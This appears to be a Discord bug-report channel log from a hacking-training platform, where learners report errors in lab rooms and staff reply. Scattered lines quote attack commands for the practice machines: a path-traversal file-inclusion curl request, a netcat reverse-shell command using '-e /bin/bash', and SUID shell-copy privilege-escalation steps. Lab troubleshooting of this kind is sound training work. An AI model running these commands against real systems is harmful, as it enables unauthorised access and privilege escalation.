#room-bugs

... 2? That's going to be a site bug. Minimum should be 8/question. Questions that don't require an answer won't award points

james do look into this....seems like a major bug

Older rooms will show 1/4 points on the monthly leaderboards, no?

Nope. I'm not site staff. I don't investigate bugs. You've reported it here, that's plenty.

Not sure. I don't know where they're looking

for the record:

older walkthroughs give quarter points

oh wait

misread

That's 8pts/q

there might be a bug in which the quarter is being applied twice

If they're getting lower, there's a problem

yeah I was operating on the baseline that walkthroughs were at 8 points per question

but that's the already reduced score

So in the new Python Room (pythonbasics), the task for the bitcoin section is extremely vague.

What should be output if the value is >= 30k?

does the value need to be output as well?

is the below 30k an inclusive, or exclusive limit? if the value is exactly 30k, what is output?

In task 7 of https://tryhackme.com/room/pythonbasics there is a typo. I believe this should say The i variable is set to 1

Room: https://tryhackme.com/room/pythonbasics
Task: 6
Error: Should be line 12 and not 15

That's technically right when you write the code out

why is this incorrect? https://i.imgur.com/hbZJoJM.png

for task 6 q3 btw

There shouldn't be an if statement there or a <

It's not a bug I recommend asking for help in #872475755362279455

but q2 is correct

with exactly the same code, yet when I change it to 101 as the question suggests it's wrong according to q3

either kill the = or set to 100

and you want to set the variable to 101, not the check

oh wait

I thought it meant the if statements' condition, not the variable

sheesh I'm bad at reading

on line 15, ... is quite confusing, tho

yeah I know

I am gettin max 4 at Mobile Malware Analysis, that's why I know it's wrong, cause the room it's really new

Cc @dusky junco

Unclear spec on the https://tryhackme.com/room/pythonbasics room. 1.2*25000 is dead on 30000, so if you've set your if statement to only output at < 30000 (which the earlier questions imply) then it's incorrect. it'd be fine if it was <= or if a smaller value was used as the example.

I feel a bit pedantic, as it's minor, but still

It seems mine is a duplicate, sorry

In the room "Python Basics", Task 8, it gives code to run.
https://tryhackme.com/room/pythonbasics

The code does not work for me without the following 2 changes. It may possibly need to include these changes for others to run it as well (I'm not super experienced with Python though so maybe not)?

in task 10 it should probably be requests not request at

Request - simple HTTP library.

https://tryhackme.com/room/pythonbasics the bitcoin question asks for a value under 30,000, but the hint and actual answer uses 35,000, so using 30,000 you cant get the right answer

task 8 ^^

you can, technically as the first question is still higher, but for the second the spec is unclear as to whether we should include 30k or not

i had a working thing and it just didnt makr as right lol

Hi, I am doing the portion of vulnversity that asks me to use Intruder to enumerate allowed extensions for file upload. In my set up none of the file extensions in the lesson are allowed. Does anyone know what could be causing this?

which file extensions are in your setup

the ones from the lesson, which are .php, .php3, .php4, .php5, and .phtml

try remove the . from each item and put the $-like symbol after the . on the full payload

ok sec

ah yes that did it. thank you

perfect, have fun

For steel mountain, the msfvenom command provided uses a different executable name than the one being used by the service that needs to be exploited. Maybe intentional, but I think not.

powershell room, found a bug

answer in form is / should be \

there is some answer tolerance

This should be fixed in the latest version of AVG - if it happens again, please let me know.

It's line 15 when using the Code Editor's Hint. 🙂 I've added that in the question. 🙂

Has been clarified now. 🙂

powershell room:

the answer is 1

but it wants two digits, is this "answer tolerance"

seems like solving a riddle / discouragement

Fixed. Thank you for reporting. Also added the extra ) after str(spent) 😄

Gave +1 Rep to @noble sable

Refresh the page, it's not answer tolerance

It's actually broken.

The idea is to modify it to get it to work. 🙂

When the question asks for 30,000 thiugh to get the flag it’s a bit misleading

Ohhh

But no

The limit MUST be 35,000 but the question tells you it is 30,000, which means you can never get it right without checking the hint

If you don't want to use the hint, you have to modify it to make it work. 🙂

There are at least two prominent members saying it's misleading.

Modifying it is fine, but the question should not be misleading.

I will check the analytics in a bit, whether more users have an issue with it. This is for T8 Q1 right?

@proper jasper Which task/question?

How are you meant to know it is actually 35,000 when the question tells you 30,000?

Task 8 of the new python intro room. Question 1 I think. Perhaps question 2, whichever one prompts for an answer

It should be ‘falls below 35,000’ to get the answer correct.

my solution had nothing to do with 35k, what was the issue you had?

Well when I used 35,000 it worked and when I used 30k it didn’t

hmm, odd

I had a solution which worked but it didn’t get the flag. I then used the hint and that obviously worked when I plugged in the variable names and values

Maybe it was my mistake, but I was under the impression that because the hint uses 35 k and the question 30k there was a discrepancy

Thank you for your input. Please continue the discussion on this if it's not clear. We're going to be looking at it. 🙂

Gave +1 Rep to @proper jasper

No probs. Apologies if it’s my mistake - I’ve just left a little confused about the question

No worries. I'm the QA engineer, I want to hear it all. 😄

is there anywhere i can give feedback without posting a potential spoiler?

For Python Basics? Probably in the #872475755362279455 channel using the spoiler tags?

gotcha, thanks

Gave +1 Rep to @glad badger

Is it a normal thing for the machine for rooms to time out despite having plenty of time per the timer (especially after I've added time)?

Normal in the sense that it may happen but it isn't supposed to. It depends on the room. What room is that you're trying? @red sentinel

I think the tricky part is that the specs aren't clear that the actual value needs to be printed

i think there is a bug in the room archangel. it is not possible to access the apache2 access.log via lfi. this should work but doesnt: curl "http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//../var/log/apache2/access.log"

have you tried .././.. instead of ..//..//

I seem to remember there being a trick to that room

The LFI was super 1-off

I re-did the room recently and the I had to restart it

¯_(ツ)_/¯

just restarted the machine and now it seems to work

with the same command

thank you!

had and issue with cyborg over the past couple of days. when retrieving the .tar file using wget (or manually getting) it only downloads 50.68K/1.5M and stops.
I've tried reloading the room 3 or 4 times, first attempted around this time yesterday. Works fine using the attackbox but not using VPN for some reason.

I am having an issue in Linux-agency. Mission25 flag is not available in that machine. I did restart that machine 4 times. Still no flags.

Thanks fixed:)

Gave +1 Rep to @soft terrace

Thanks - updated - might take 10-20 minutes to update live

Room: Kenobi Question: "How many exploits are there for the ProFTPd running?" In our console (attackbox) we can only see 3 although the answer is 4.

i would like to till you about a bug in the online attck box machines but I am lazy to write a report, if you load tryhackme and open split view while you are on split view in the host , the display gets confused and starts resizing the screen rapidly

@hazy tiger ya twit. You got me to change this last week. Which is it, three or four?

This is context to what the shell room... task 3....reverse shell using netcat...it is stated on the target machine, the command is nc <local-ip> <port> -e /bin/bash....i guess the local-ip should be replaced by the remote-ip or attacker-local-ip...please confirm

Attacker local IP, yes

"Local" refers to "you"

"Target" refers to, well, the "target"

Look at the screenshot I attached, AttackBox is probably outdated

It was added really recently

thanks @obsidian kiln .. so when we say local-ip on target it means not the target local-ip but the attacker-local-ip

Gave +1 Rep to @obsidian kiln

@dusky junco please update Searchsploit on AB?

Yes -- that will be the case throughout the room

👍

https://tryhackme.com/room/printerhacking101

Room says

SSH password can be easily brute-forced (weak password).

But the room is so laggy that any SSH brute-force attempt results in a timeout or connection error.
Screenshot taken after 30min the box was started:

Eventually it started working but it's very slow (20 tries/min) and after 7min the password is still not found.

The author said teh password was very weak on the only Write-up of the room used the same hydra command with rockyou too.

It just seems that the box is much slower now than it was 310 days ago when released.

Hopefully the task can be solved using the web interface on port 631 so the PRET tool and the local port fowarding are not required

and so cracking the SSH password is not mandatory

Because the password is not down after 20min of hydra

Web pages are also taking ~30-60 sec to load

Must be an AWS instance issue, I stopped the room and started a new one which is much faster to answer (only port 631, brute-forcing the ssh password is still hopeless).

I crack it easily

But you are a subscriber right? Machines are much faster for VIP users.

hello i am having an issue in linux fundamentals 2 where it wont let me enter the password to the remote machine unless i hit enter in which case it declares it wrong and wont let me type again i have reloaded page and machine multiple times and nothin wonderin if this is a thing others have run into

It doesn't render anything when you type the password, that's normal.

Password Security, this is wrong.
Ignore the highlighted bit, but the cracking speed isn't related to the difficulty of finding collisions, it's related to the speed you can compute hashes at. You're not looking for a collision.

how websites work task 1

on the video it was front end
and now i put in client side and that works
but then the video is wrong ore the task need a update that is is like in the video

Btw thank you so much love the site love to learn like this

The task was corrected

The answer being different just means you can't copy from the video

great thanks

i got bug with the room

it doesn't want to connect

Try #site-support first please

hey , I was doing the KoTH food room and the ||monitor|| webpage is not working for me, it's trying to get the html page but always gets stuck , anyone got this ? ( page works fine with curl , just the browser, tried chrome and firefox )

same.. I can ping the machine. Curl works for me aswell.. but it just keeps on loading

also I noticed it gets stuck on 2.10 KB / 2.46 KB of the html response

Sounds like the MTU issue. Check the pins in #site-support

oh I can't believe I didnt try that , sorry , thank you !

https://tryhackme.com/room/ccpentesting

Under gobuster, this seems to be incorrect.

At least in my installation, -h is "help"

The manual and help don't have an entry for http header.

it does a little deeper, try "gobuser dir -h"

Refresh the page

See what it changes to.

(Answers aren't case sensitive)

oic... case sensitive. Wonder why my man page and help don't have it.

Well, glad I hedged with "seems to be incorrect" 🙂 Thank you.

at least you learned

Room: EasyPeasy. Flag3 was present on source code and can be extracted using curl command. There was no need to crack the hash with easypeasy.txt.

Hi. I was doing the Common Linux Privesc room and was in Task 4. When attempting the question no 6, I entered the value, submitted it but it was showing "Uh-oh! undefined" and at that very moment, my Bitdefender Antivirus was showing a notification like this

I guess this is the right room to talk about this issue

Hey, @lucid oasis your the person to go to about room tasks not loading because of AV right? Sorry if I've got this wrong 😅

Hey Jayy, that's right - thanks for letting me know. Not seem problems with Bitdefender before - Will make a ticket, just need a few more details.

Hey Santro - would you mind DM'ing the following:

• A full screenshot of the AV block notification
• Your AV version
• Which Windows OS you're on

I'll look into submitting a false-positive ticket once I have this info

Sure!

Thanks:)

There's been lots of problems with bitdefender before, especially submitting /etc/passwd as an answer. Bitdefender flags that as an RCE attempt

hi, i'm on the Corp room and can't connect to it. Here is my settings did I made something wrong ?

Hi, i can't open : overwrite.uploadvulns.thm for Learning Path of "Upload Vulnerabilities", can you please check, thank's !

Have you added it to /etc/hosts?
This question would be more appropriate in #room-help or #site-support

@eternal summit is there a problem with the room or is it coming from me ?

Have you asked in #room-help ?

i'm doing it right now

https://tryhackme.com/room/hackpark is really really slow, any idea of why?

It's too slow that i can even execute commands

Dang it’s been a while since hackpark was hit, have you tried migrating to a different process? I’ve had similar issues with timeouts on some processes

It's general, i mean, since y start the machine is very slow (acces to the webpage is also really slow)

That's really annoying - I've opened up a ticket through Bitdefender's website. Hopefully they'll get back to me so I can further explain the trouble its causing.

Idk if this is a bug but theres a - between now and select
Enumerating SMTP part, question 4
https://tryhackme.com/room/networkservices2

pls let me know if its supposed to be there

the last task in the metasploit room is outdated and does not work with msf6 :3tyvm

That's the same problem I'm facing

Yep, that exact room usually

It's a false positive from bitdefender

Room : Web Enumeration (Subscribed) by @dusky junco Ben, namelessone
The answer should be updated
By the way hint contains the right answer

Hey guys I just noticed a problem with the OWASP Top 10 room, in [Severity 3] Sensitive Data Exposure (Challenge). When I view the source code, the answer is not in there. There is supposed to be a note left in there and that's what I need for everything else in the section, but something must have happened because there is no longer a note. I'll post a picture for proof. If anyone can help me fix this issue I would really appreciate it. I am on a roll and want to keep going 😅

I don't remember putting a note into that box?

I saw a picture from one of the walkthroughs of the room and they had the note where the empty space is in my source code. I'll post a picture from the walkthrough I'm referring to

That's the login page

You're on the home page

Lmao 😂 🤦‍♂️ it's been a long day, I'm laughing at myself now. Thank you!

Np 😄

i am doing the xss playgrounf room and the evasion filter task. i managed to pass the filter which removed alert and i get the alert("Hello") but i do not get the flag, same for the hello filter

Isn’t that room flat out just broken? @eternal summit you were talking about remaking it a while ago right?

It's uh. Not so broken as it works in a really weird way

It's a LOT of work to remake, I started but gave up

Room: Brainstorm
Issue: Correct answer for task #1 is '6 open ports', but there are only 3 ports open.

I have restarted the machine, reconnected to VPN, and ran several nmap scans. I have also checked several writeups, and they also show only 3 open ports.

Powershell For Pentesters, the MD5 hash seems to have changed as I keep getting wrong answers

Nevermind restrating worked, well that was weird

in https://tryhackme.com/room/yara ; the intro says you can do it all on your own box, but has "suspicious files" on vm- should be downloadable

Yara needs a content update due to new updates to tools such as Loki. Posting here so I can make a ticket for my to-do list next week cc @worldly grotto thanks ((:

Gave +1 Rep to @worldly grotto

I'll also make the files downloadable

so good call on that

thank you 🙂

Gave +1 Rep to @dusky junco

I’ll put some time to this next week but it seems like quite a substantial change. I’ll have to see how my to-do / schedule is on Monday ((:

Not broken, just expects a specific xss payload

Is this the right place to report a room that contains factually incorrect information?

Sure, what's up? 🙂

https://tryhackme.com/room/johntheripper0 , Task 1, "What makes Hashes secure?" section: Although the author admits that he is "in no way qualified to try and explain" the P vs NP problem, he still misleads the reader by comparing NP to hashing and P to un-hashing, implying that NP problems are easier than P problems, which is false.

Also at the very least Task 1 could use some proofreading. I'd be happy to take it on if that's a thing.

I'm on Blue and the exploit in msf isn't working. I restarted the vm and tried again per the instructions

It could take multiple restarts

ok

i tried it at least 5 times

https://tryhackme.com/room/wreath in this room the link for linuxfundamentalspart1 is outdated

hi what task is this for please?

nvm I've found it (: ty updated

No, only if you do it wrong

Use the bash file from the machine itself or a static binary.

The box has not been touched, so that's wrong.
If they copied a bash file from their own machine, that may now be using different libraries.
As I said, use the bash file from the machine itself or a static binary.
There is nothing wrong with the box, only your steps to exploit it.

This is not a bug with the room. If anything, it's a bug with the writeups.
I made the box. I also understand why the error is happening.
There is nothing wrong with the box.

Send me a link to the writeup

Okay, so there's the problem

You are using your own copy of sh

That's the one that uses the up-to-date libraries

If you use the one from the box you won't have a problem

Also, please, please, please think about these things before arguing with the room creator that there's a bug in a room that hasn't been updated since the last few thousand people completed it.
Reporting bugs is fine -- arguing that you're right when the solution has been explained is irksome

No -- copy /bin/sh from the remote machine into the shared directory 🙂

As in, don't copy your own /bin/sh

Copy the one already on the box, given that's compiled against the right libraries

cp /bin/sh /home/james by the looks of it

Then on your own machine:
chmod +s sh

You're in the bugs channel 😆
You reported a bug, which is what James responded to -- you didn't ask for help with it. I read between the lines and helped anyway 🙂

Ah, did anyone help there?

You are welcome 🙂

Also, I did provide solutions several times - Use the bash file from the machine itself or a static binary. @hoary mountain

What is the update schedule for the AttackBox? dirsearch requires python 3.7 now and I've run into a few other incompatibilities lately. The video walkthroughs for some of the paths recommend using these tools that won't run in AttackBox anymore..

cc @dusky junco

They won't have been updated to incompatible versions though?

Ubuntu 18.04 can't update Python past a certain version

3.6.9, if memory serves

Correct

dirsearch doesn't seem to be on the attackbox. I can use dirb or gobuster, I was just trying to follow the video verbatim (which other folks that are less experienced would probably do)

Gave +1 Rep to @eternal summit

In https://tryhackme.com/room/thefindcommand task 2 question 3 answer is wrong, should be -type d and not f

have you refreshed the page?

Lol

Now it s d but in order to get the correct answer it accepted only -f

😦

it would have accepted -type d

Your answer needs to be within 10% or so of the correct answer

Refreshing the page replaces what you wrote with the correct answer

Didn t know that

Thanks

That’s not a bug, it’s answer tolerance. Refresh the page and check the answer field again

Hello, in Room "https://tryhackme.com/room/steelmountain" Task 4, The Target Machine is not connecting back to my netcat listener.

It successfully fetches nc.exe file from my http python server
10.10.134.146 - - [09/Aug/2021 13:35:36] "GET /nc.exe HTTP/1.1" 200 -

But it does not connect to my netcat listener

That's unlikely to be a bug @jagged comet -- try #room-help 🙂

I figured out my mistake, i downloaded the nc.exe using wget, so i downloaded the html page

thats why nc.exe is not working

dumb me

As I said -- probably not a bug 😄

Sorry, XD

Np 🙂

In room https://tryhackme.com/room/pythonbasics, shipping.py file doesn't tell anything about the condition customer_basket_cost = 100 . This doesn't cause any bug for the room but makes confusion between using if-else or if-elif .

https://tryhackme.com/room/malresearching
I believe the wrong image is displaying for the hash collision example. It's the same image that is used as an example of not a hash collision. And it doesn't really make sense in context. I think there's probably supposed to be an image like file: "tryhackme" and file: "tryhackyomamma" with the same MD5 hash (or Sha256 or whatever).

On the Blaster room you are supposed to dig through the browsing history on a target machine in order to find out which exploit to use. The history is not saved however, so you can't progress further

CC:Pentesting Task 7, it isn't msf5 anymore it is now msf6 😄

Corp. Task 3. Should NOT recommend --force.

There are a number of problems with corp

every time I bring them up they’re acknowledged that they’re problems then never get changed and the room stays up

Steel Mountain room: PowerUp1.ps1 is no longer maintained and generally breaks when executed in Powershell from Meterpreter. I've found other options like
PrivescCheck but the information provided by the task doesn't help indicate exactly what to look for.

https://tryhackme.com/room/bpsplunk
1.) Task 2 - The word "Linux" is clickable and shows the 3 Linux Fundamentals rooms, but only the first hyperlink points to the correct location
2.) what command do we use to specific regex within a search? -> specify, not specific

The micrsoft sql server service in https://tryhackme.com/room/ustoun does not start even after 40 min+ of waiting

I reset the box multiple times, but still it was not open

In the brainstorm room. Task1 asks about number of ports open and there are only three: 21, 3389, and 9999. That’s three
Yet the expected answer is 6. I asked in the #room-help and confirmed I’m not the only one seeing only 3 open ports

Are you scanning all ports?

Yes I am, used the “-p -“ flag

I used it today with no issues. If you stick with the normal versions from github there should be no issues

Hi guys, does the Metasploit exploit still work for the Blue room? https://tryhackme.com/room/blue Here it just doesn't work, no matter what and how simple this it, the exploit fails. Used almost 10 vm's so far to be sure.

Yes, it does still work.
Make sure your LHOST is correct, and check firewalls and NAT. You can get help with it in #room-help

Ow ow ow ow ow ow, d@mn, lhost 😄

just see it right now :-D, need to go bed apparently 😄

did not even have looked to LHOST, was following an easy room before going to bed and followed THE exact instructions without looking further 😛

And yes, it's working now! Thanks 😄

remember, you can say set LHOST <interface name> instead of the ip 🙂

sames me alot of time

Yes, using that a lot of time to refer to the tun0 😄

But here, for some stupid reason, I just forgot the LHOST. Followed the walk through too strictly 😄 I'm busy doing an up to date writeup as things changed actually. Like the Task 3: Escalate shouldn't be done at all by now. That's automagic now 😄

Thanks for the tip anyway! Good to share info!

Gave +1 Rep to @signal tundra

i just encountered a bug and wanted to inform other beginners like me who are still in the presecurity . the correct answer which the instructor registered is "front end" i typed it exactly like it was with no typos but the server fails to register , then i typed client end and accidently pushed the '' making it the correct one . i am sure that this symbol is included within the answer itself or else it wouldnt have approved it

\

just wanted to inform others that the correct answer is 'client end\'

It's not. Refresh the page. It's just answer tolerance.

It's also client side not front end or client end here.

@eternal summit but for the instructor front end was registered as a corrrect answer

For the video, yes.

It was changed to a more accurate answer.

ohk

i am new here where can i get beginner related answers

Again, refresh the page and the correct answer will be shown.

Depends what they're about.
Take a read through #start-here and that will explain.

i am doing attacktive room and im at task 7 im using Impacket v0.9.22 and i believe that my syntax was correct i even do the on from the writeup but the result doesnt portray the right result basing on the writeups

https://tryhackme.com/room/catregex Task 5: Question 3: Answer=^\d I believe this is incorrect. This would match a line which begins with a digit.

That will match a single digit at the start of a line 🙂

^\d.* would match an entire line starting with a digit

Correct

But they want a non-digit....so ^[^\d].*

Oh, refresh the page -- you've been hit by answer tolerance

It's looking for ^\D which matches a non-digit at the start of a line

Meaning? It somehow passed the code check?.

I see...

Meaning the site doesn't check capitalisation

It thinks \d and \D are the same

The question asks for a metacharacter

That's a pretty significant check when it comes to regex.

Yes, it is. Unfortunately we can't turn it off

Oh okay.

It's in there so that if you have to type out any long answers, a little mistake doesn't make a difference

Thanks for the confirmation

But we, as room creators, can't control it

Np 🙂

https://tryhackme.com/room/pythonbasics task 6:

looks like line 15 to me

Hi there, Just sharing as things seems to be outdated / not in sync in the blaster room https://tryhackme.com/room/blaster In the walk through video, we are supposed to find the browser history. Like shown here: https://youtu.be/PoRPbbQnhEQ?t=723 But there's is none when I try this out. Also looked manually in the user profile with the Explorer, no history traces.

Had found my information by looking up that file located on the desktop. Just that the video or virtual machine is not reflecting what it is supposed to be

BTW, in that room, Task 2, last question, it's not about the file user.txt but root.txt file

https://tryhackme.com/room/pythonbasics
Task 3... I can do other operations than what mentioned in the question to display the flag

room: https://tryhackme.com/room/pythonbasics
task: 5

First of all, No the logical (or comparison) operators does not allow assignment.
Secondly those are not logical operators. Logical & Boolean operators are the same thing and the names can be interchangeable. They are comparison operators.

The mysql tasks in network services 2 does not have the vuln mysql version

It is updated, and the attack does not work on it

You're not exploiting a vulnerability, you're using credentials that you were given

It's not version specific

It asked me to use "mysql_enum" to exploit an old vuln, but it does not work on the machine in that room.

It's not exploiting a vuln though.

If it doesn't work, provide details on what doesn't work.

I will, sorry for not doing that earlier. Ill explain it in details, maybe I misunderstood it.

Hello,
I meant this part of the task. mysql-enum does not work here, any username it checks will return it as valid

Show us.

that it always returns usernames as valid?

It's not meant to be checking usernames

Seeing as you have creds...

ya i have the username and pass, but I tried using nmap as mentioned in the example above but it didnt work

just thought it was a mistake

all good

In the https://tryhackmemcom/rooms/linuxprivesc task 19 in the /etc/exports file the correct line is commented so the user should de-comment the right one and comment the one with no_root_squash

In the https://tryhackme.com/room/rpburpsuite task 10 in the "
Let Sequencer run and collect ~10,000 requests" process it will begin the Sequencer and when done after selecting "Analyze now" it will crash BurpSuite making you re-do it again (Happened twice in two different rooms)

https://tryhackme.com/room/teamcw this does not appear to load the correct web page. Spent an hour enumerating to get nothing, until I decided to see a walk through. I am unable to load the website even after terminating and starting a new instance:

not a bug, you’re missing something :)

I found a "bug" (I think so) in windows fundamentals part one task 6 Question 4
||when I am in lusrmgr and double click on tryhackmebilly It shows that account is disabled option is not checked, so the right answer should be account is enabled, but it didn't work so looking up a write up I found the "right" answer to be disabled, I have to pictures that will explain more ||

Am I missing something?

I looked into it more maybe it meant the Guest account

Yes the question is for the Guest account

iirc

Following off what @nova lodge posted in #room-ideas it doesn't appear that the room "NIS - Linux Part I" can be completed. The author links you to a room that has been made private; at the same time asking you to answer questions from those rooms. If I'm incorrect please let me know, also let me know if this ins't the correct section to post this. Thanks.

Gave +1 Rep to @nova lodge

https://tryhackme.com/room/linuxfundamentalspart1

Task 4, Question 2's hint; "Run the commend" -- typo, presumably should be "Run the command"

Ahahahahaha

Cracking

I’ll sort that out in the morning @hazy tiger

Cc @obsidian flame ?

Aye, let me look into it. sorry, been off the grid for a long time due to personal reasons

thanks for the heads up. let me see if i can link it to the replaced linux ones

If it’s not major I can get to it this weekend for you @obsidian flame hope you’re doing well (:

nah it's okay i'll look into it tomorrow 🙂 thanks for the offer though

also thank you for asking, stuff is getting better now

Hello everyone, walking An Application room in Viewing the page source question number 3 flag is not applying.

@tropic notch I just finished that room yesterday. there are so many flags on the website. you gotta find the right flag for each question.

@nova lodge thanks

Gave +1 Rep to @nova lodge

Hi there, do you know if there might be a bug with room Brainstorm on task 1 - How many ports are open?

Guys in Network Services 2, I'm stuck in the NFS portion, at the last section, when it asks me to run the bash, is throws an error "unexpected token 'newline'" I am not sure why it happened. I've assigned required permissions to the file as well. I've been playing around it since yesterday but I don't have a clue why it runs, I even downloaded the bash file in raw, copy pasted it into differnet locations and moved.. I even watched WALKTHROUGHS but they're easily solving it, I think I've this error because I am using the Attackbox (maybe). I see most people have the same error in the comments on walkthroughs. I tried every solution found online and now I've no clue what to do. Although I've already got the flag through videos, I wanna find it on my own by running the bash file.

I think this is a bug maybe I am not sure

It's not a bug, you've downloaded the bash binary incorrectly. You've downloaded a HTML webpage rather than the binary.

But how I am so confused, I followed exact procesures mentioned

I even downloaded the file raw

I used wget to download

ccing @dusky junco too and @void vortex

Room has been updated to reflect the changes in the rooms. apologies for the long wait

Thank you Chev!

Anytime

Anything else that needs to be patched from my side?

You’re a legend, Chev (:

Broken image in openvas room

Resolved (: Uploaded it our S3 so that it doesn't expire again ty for reporting cc @twin tapir

Gave +1 Rep to @harsh vale

Where link of bug bounty room ?

I guess you mean either https://tryhackme.com/room/nahamstore or https://tryhackme.com/room/owasptop10 . But you can search for rooms if you go on the tryhackme.com > learn > all rooms, then you will get a search bar which you can use to find whatever room you want

Thanks

Gave +1 Rep to @chrome yacht

Not sure if this is the right place, but the room Lian Yu has a link to a youtube video that doesn't exist anymore. Location: ||<ip>/island/2100||

Room: Golden Eye
Task: 2
Question: 3

"Inspect port 55007, what services is configured to use this port?"

I found the answer, but it is completely incorrect. The service that is configured to use this port is not the answer.

Hope this helps.

In the owasptop10 room for the 25 task which the cookie has to be changed to admin, it is not needed ,for the plain user who I got it the admin page and the flag.
https://tryhackme.com/room/owasptop10

https://tryhackme.com/room/pythonbasics

Task 10: The hyperlink to the requests module is missing. I'm not sure though that it's on purpose or not.

hey thanks (: I fixed the web app for this over the weekend I just need to put it onto a new VM. Thanks for reporting!

Gave +1 Rep to @real swift

ok then you know about it

my LinuxPrivesc room machines are freezing for couple of minutes, then it works for 2-3 minutes and freezes again for 2-3 minutes,
really annoying cant work normally, how to handle this? kind regards

I'm doing the linux fundamentals 1 and I'm on the "Interacting with file-system " part. When I start the machine and try to answer the first question were I need to write how many folders there is I write 8, but after trying all numbers the right answer was ||4||. And it is the same thing in the next question I need to write the name of the folder that contains a file, the folder that contains a file for me is not the right answer. What should I do?

That sounds like you've deployed the attackbox instead of the target machine

It seems the Kali machines dont feature gobuster which has to be used to complete the ccpentesting room

The AttackBox does have Gobuster installed

Yes ikr. But the Kali doesnt, so i thought i let you know

The Kali is not maintained -- if you're using it, you do so at your own inconvenience 🤷‍♂️

I see. Thanks for the heads up

Room: OpenVas
I saw that broken images were reported/resolved prior to this, however it looks like there are still broken images. Specifically task 2, we are missing a breakdown of the GVM framework.

I had the same thing. Didn't know what was going on at all. But apparently I clicked the wrong deploy button and had the wrong machine up. It got confusing.

The video isn't strictly necessary to complete the room

I noticed that as well, it's a bit of a stretch tbh

hi i am new and i am in linux fundamental part1 room in task 6 i need to start a new machine but when i connect i am on web site wich want name and password is it normal? because in this room we suppose learn linux command not hacking site thanks for your help

blackdragon tell me coming here #site-support message

You don't have to connect to a website or whatever, deploy your machine and a SSH instance will open in your browser as it shown in this picture

From there you'll be able to follow along the tasks

it launches a DVWA host for task 6 though

Yep that's weird, I haven't had that the first time I did the room iirc

I think only the Task 3's machine is needed ( as shown on the picture above )

i change browser but the same

Did you try with the Task 3 machine ?

no i think task3 machine don't work we have not the same directorie and files

it's something with the room, but if you relaunch the task 3 machine you should be able to finish the room

Can you take a picture ? It'll be easier

no i don't find good files with task3 machine

@dusky junco something has changed here

always the same server

the server task 3 have juste 4 fiolder folder1 folder2 folder3 folder4 in task 6 we can find Desktop documents Pictures ans folder1 and the same for files

there is a file in the home directory that you need for the task

hopefully cmn can figure out where the extra machine came from

it is very strangfe if i am alone with this problem

it might have changed recently

for the task 6 i try the "grep" on the task 3 server but no response i think is not the good file

You need that "folder1" for the Task 3 so I think it's correct

yes task

3 is ok

but for the task 6 Use grep on "access.log" to find the flag that has a prefix of "THM". What is the flag?

I think you just have to not pay attention on the Task 6 machine

just use the Task 3 one

and i have no response

i will re try

I'm going to try it by myself to see what happen

ok thanks

It's working as intended

with the task 3's machine deployed, so it should work on your side too

ahh yess i make a mistake i try this grep this somme line up

Using "grep" to find any entries with the IP address of "81.143.211.90" in "access.log"

Yes you have to put your own deployable machine IP between quotes, not the 81.x.x.x.x one

rohhhhhhhhhhh big mistake

but if task 6 machine is useless they must remove it because you can't understand

Yes I agree, maybe CMN will have a look later

i think it is a probleme beacuse when you see the beginig of task 6

tryhackme@linux1:~$ ls
Desktop Documents Pictuers folder1
tryhackme@linux1:~$

Desktop
Documents
Pictures
folder1

but in task3 machine you have not these folder

but if we can continue it is the most important

Yes that's a little confusion, was not there the first time I did it so I can't help you more on that

Of course you can

thank you very much th most important is to continue

now i can

No problem, glad I could help

the english don't help me too i am french

You can use https://www.deepl.com/translator if needed

i use imtranslator on the navigator is good too

Alright

When you followed the link on the instructions page, and then used wget with that link, you've downloaded the HTML version of that github page. If you right click the Download button and select "Copy link address", you will notice that these links are slightly different: .../blob/... --> ../raw/... So, the easiest way is to right click the Download button and copy the correct address to the file location. Hope this helps.

Yes you're right, I've no idea how that suddenly appeared in task 6. I've removed it (: thanks for letting me know. Apologies for the confusion

Gave +1 Rep to @civic brook

cc @marble fulcrum & @wheat fractal ^ (:

Nice thanks CMN

Thanks CMNatic part1 finish i continue...

Room: Owasptop10
Task 26
https://tryhackme.com/room/owasptop10

The Github link found under 'The Exploit' section in Task 26 points to resources that seem to be for another room dealing with cloud settings.

Current Link:
https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3

Correct Link: https://gist.github.com/1UC1F3R616/afb89c6dfcd5c1b835c59f2e07fdc313

O.o

How on earth has that broken

I have updated https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3 ty (: @outer pollen

Gave +1 Rep to @outer pollen

Hello. I am on the CTF: "Simple CTF". I am blocked for several minutes and I decided to have a look at a solution. I have seen an access to the web page and from my side I can't reach it, either via my browser or via curl/wget. Do you have a solution?

Can you be a little more elaborate about your issue?
What exactly are you trying to reach the web page?

i had « time out » in browser and with curl and wget

Then it means you are not connected.
Just check if the VPN is successfully connected

It happens with me as well😂
Now, I always check whether there is something wrong with the openvpn process and connection

I shutdown and restart openVPN and the VM, but nothing works

Did you try refreshing the page?
It shows me that the Owner has made this room private😅

Perhaps it is being fixed or something🤔

Probably 🤷‍♂️

There seems some problem with the room "Post Exploitation Basics".....Unable to ssh into the target after multiple tries and changing my vpn

Not a huge deal, but in the Network Services 2 room, in task 6 "Enumerating SMTP" it says that the "top-usernames-shortlist.txt" is inside the directory /usr/share/wordlists/SecLists/Usernames. The real path to this file is /usr/share/seclists/Usernames. Took me way too long to figure it out lol

/usr/share/seclists/Usernames/top-usernames-shortlist.txt to be exact 😛

There should be a symlink for /usr/share/seclists as /usr/share/wordlists/seclists

Huh, well there wasn't for me, I installed through apt, maybe you need to reboot for the symlink to be there?

I am not sure about that, reboot process.
This type of system configurations are done during the package installation, so I doubt it.
Possibly the room was discussing about the Kali Attackbox, Kali should have that pre-installed🙂

I'm using Kali 😛

Not AttackBox mind you, but it should be the same I would think

It's Kali either way

Yeah, both of them are Kali.
Attack box is Ubuntu. But the attack box should be configured for THM.

Nvm, now that you have found the correct path, you are good to go then👍 👍

Yeah, I tried rebooting but still no symlink in either directory. As I said, not a huge deal, but yeah 😅

Attackbox isn't Kali.

Attackbox is Ubuntu with security tools installed.

Hi How long did it take for you to get the pwd

I am stuck son 612 tries after 3 hours and nothing useful?

Oh, I am so sorry about the misunderstanding. I was thinking about the Kali Boxes😅

Hi! I am on the ToolsRus room. On the room's machine I am trying to run the metasploit module but getting the upload failed. Then tried again manually uploading a WAR file on the apache and upload failed. Also already tried terminating and starting a new machine with no success. I am sure this is the path but something seems that is wrong with the web server. Any clues?

